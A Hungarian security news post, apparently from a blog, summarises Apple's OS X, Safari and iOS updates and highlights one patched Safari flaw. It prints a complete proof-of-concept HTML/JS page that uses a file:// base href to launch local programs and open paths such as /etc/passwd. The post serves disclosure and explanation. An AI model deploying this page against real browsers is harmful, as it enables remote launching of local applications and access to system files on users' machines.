Az Apple tegnap és ma számos frissítést tett közzé különböző termékeihez, köztük az OS X-hez, a Safarihoz és az iOS-hez. A több száz hibajavítás között találunk foltott két éves BIND hibára, de olyan újdonságnak számító változtatások is bekerültek a csomagba, mint a TLS v1.2 támogatás. A javítások jelentős persze most is a különböző médiafeldolgozó rutinokat érinti, illetve szintén nagy számban vannak jelen az XSS, vagy azzal rokon webes sebezhetőségek.
Teljes listáért a fent linkelt hivatalos Apple oldalakat tudom ajánlani (bár a hibaleírások szokás szerint elég szűkszavúak), én most egyetlen hibát emelnék ki a sok közül (via @sghctoma) - az alábbi egyszerű HTML/JS oldal azt demonstrálja, hogyan lehetett tetszőleges helyi alkalmazást távolról futtatni a Safarin keresztül:
<html>
<head>
<base href="file://">
<script>
function DoIt() {
alert(document.getElementById("cmdToRun").value);
document.location=document.getElementById("cmdToRun").value;
}
</script>
</head>
<body>
<select id="cmdToRun">
<option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>
<option value="/etc/passwd">Launch /etc/passwd</option>
<option value="/Applications/Utilities/Bluetooth File Exchange.app">
Launch Bluetooth File Exchange.app
</option>
</select>
<br />
<input type=button value="Launch" onclick="DoIt()">
<br />
</body>
</html>
